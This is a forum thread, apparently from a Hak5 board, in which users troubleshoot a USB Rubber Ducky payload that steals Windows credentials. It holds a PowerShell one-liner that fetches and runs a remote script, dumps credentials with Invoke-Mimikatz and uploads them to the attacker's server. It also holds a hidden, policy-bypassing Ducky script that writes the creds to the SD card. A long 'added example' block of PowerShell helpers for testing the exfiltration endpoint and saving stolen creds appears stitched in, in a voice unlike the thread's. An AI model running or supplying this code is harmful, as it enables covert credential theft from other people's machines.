Exmix Posted September 2, 2017

So, messing with this payload I found here: https://www.hak5.org/blog/15-second-password-hack-mr-robot-style

I got it all working up to the point where it tries to output the file back to my web server. I get an error that says:

    Exception calling "UploadString" with "2" argument(s): "The remote server returned an error: (405) Method Not Allowed."
    At line:1 char:156
    + IEX (New-Object Net.WebClient).DownloadString('Http://MyWebServer/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString <<<< ('Http://MyWebServer/rx.php', $output)
        + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException
        + FullyQualifiedErrorId : DotNetMethodException

So I was looking into this error for a while and I can't really find much on how to fix it. My web server is Windows 2012 R2. I was wondering if anyone could help me fix this part, or help with how to just output it to a .txt file or something on the SD card, since I have my Duck set up as the TwinDuck.
ThoughtfulDev Posted September 2, 2017

Are you sure that PHP is enabled in your Apache or IIS web server? Try to place a PHP file, e.g. test.php, in the web directory root with the following content:

    <?php phpinfo(); ?>

If you now visit yourwebserver/test.php you should see a table with some information if PHP is enabled.

I use this to run mimikatz from sdcard/exec/mimikatz.ps1 and save the content to sdcard/data/mimikatz:

    REM -------------------------------------------------------------------------------------
    REM Get drive letter of drive with label DUCKY
    REM -------------------------------------------------------------------------------------
    STRING for /f %d in ('wmic volume get driveletter^, label^|findstr "DUCKY"') do @set duck=%d
    ENTER
    DELAY 500
    REM -------------------------------------------------------------------------------------
    REM Copy and execute Invoke Mimikatz
    REM -------------------------------------------------------------------------------------
    STRING if exist %duck%\exec\mimikatz.ps1 powershell -NoP -NonI -W Hidden -Exec Bypass "Import-Module %duck%\exec\mimikatz.ps1;Invoke-Mimikatz -DumpCreds|Out-File '%duck%\data\mimikatz\%computername%_creds.txt';"
    REM Without this ENTER the command is only typed into the prompt, never run
    ENTER

Make sure that sdcard/exec/mimikatz.ps1 and the folder sdcard/data/mimikatz exist.
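The two problems in this thread, a POST that the web server rejects with 405 and writing the output to the TwinDuck card instead, both have a quick native check. The following PowerShell is an added example, not code from the thread, from Hak5's payload or from ThoughtfulDev's script: Test-UploadEndpoint makes the same WebClient POST the payload makes and reports the status code so you can tell a dead PHP handler (405 from the static-file handler) from a working receiver before running the whole thing; Get-DuckRoot and Save-ToDuck do the DUCKY volume lookup and the Out-File step of the Ducky script in PowerShell, creating the data folder if the card lacks it. The URL http://MyWebServer/rx.php, the volume label DUCKY and the folder data\mimikatz are assumptions carried over from the posts above, and the syntax is kept to PowerShell 2.0 so it runs on the same hosts the error output above comes from.

```powershell
# Added example (not from the thread, Hak5 or ThoughtfulDev's script).
# Assumptions: the receiver URL http://MyWebServer/rx.php, the volume
# label DUCKY and the folder data\mimikatz, all taken from the posts above.

function Test-UploadEndpoint {
    param([Parameter(Mandatory=$true)][string]$Url)
    # WebClient.UploadString() is a POST, the same call the payload makes.
    # A 405 means the URL resolved but the handler serving it does not accept
    # POST; on IIS that is what the static-file handler answers for a .php
    # file when PHP is not installed, so rx.php never ran at all.
    $wc = New-Object System.Net.WebClient
    try {
        # Note: if PHP does work, this probe string reaches rx.php like real output would.
        $body = $wc.UploadString($Url, 'probe')
        New-Object PSObject -Property @{ Url = $Url; Status = 200; Ok = $true; Body = $body }
    } catch {
        # PowerShell wraps the .NET WebException in a MethodInvocationException.
        $inner  = $_.Exception.InnerException
        $status = $null
        if ($inner -is [System.Net.WebException] -and $inner.Response) {
            $status = [int]$inner.Response.StatusCode
        }
        New-Object PSObject -Property @{ Url = $Url; Status = $status; Ok = $false; Body = $null }
    }
}

function Get-DuckRoot {
    param([string]$Label = 'DUCKY')
    # Same lookup as the "wmic volume get driveletter, label | findstr DUCKY"
    # line in the Ducky script, done through WMI so nothing has to be parsed.
    $vol = Get-WmiObject -Class Win32_Volume -Filter "Label='$Label'" | Select-Object -First 1
    if (-not $vol -or -not $vol.DriveLetter) { throw "No mounted volume is labelled '$Label'" }
    return $vol.DriveLetter    # e.g. 'E:'
}

function Save-ToDuck {
    param(
        [Parameter(Mandatory=$true)][string]$Content,
        [string]$SubDir = 'data\mimikatz'
    )
    $dir = Join-Path (Get-DuckRoot) $SubDir
    # -Force makes this a no-op when the folder already exists, so Out-File
    # cannot fail on a missing path (which would leave you with no file at all).
    New-Item -ItemType Directory -Path $dir -Force | Out-Null
    # Timestamp in the name so repeated runs on the same host do not overwrite each other.
    $name = '{0}_{1:yyyyMMdd_HHmmss}_creds.txt' -f $env:COMPUTERNAME, (Get-Date)
    $file = Join-Path $dir $name
    $Content | Out-File -FilePath $file -Encoding UTF8
    return $file
}

# Usage, with the assumed URL and the Invoke-Mimikatz function from mimikatz.ps1:
# Test-UploadEndpoint -Url 'http://MyWebServer/rx.php' | Format-List Url, Status, Ok
# $output = Invoke-Mimikatz -DumpCreds | Out-String
# Save-ToDuck -Content $output
```

Run Test-UploadEndpoint from any box on the same network as the web server first: Status 405 with Ok False is exactly the failure in the opening post and points at the server, not the payload; a 200 whose Body is whatever rx.php echoes means the PHP handler is wired up. Save-ToDuck throws if no DUCKY volume is mounted, so put it after the TwinDuck's mass-storage side has had time to enumerate, which is what the DELAY in the Ducky script is for.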
Exmix (author) Posted September 2, 2017

10 hours ago, ThoughtfulDev said:

    Are you sure that PHP is enabled in your Apache or IIS web server? [quoted post above]

Wow, I feel so silly. That's the one thing I didn't check... I got it running on there with no issues as soon as I installed and enabled PHP. Thank you so much. Also, I like your script as well; I'll grab that and save it for when I want to try that. Seems simpler and doesn't require an internet connection.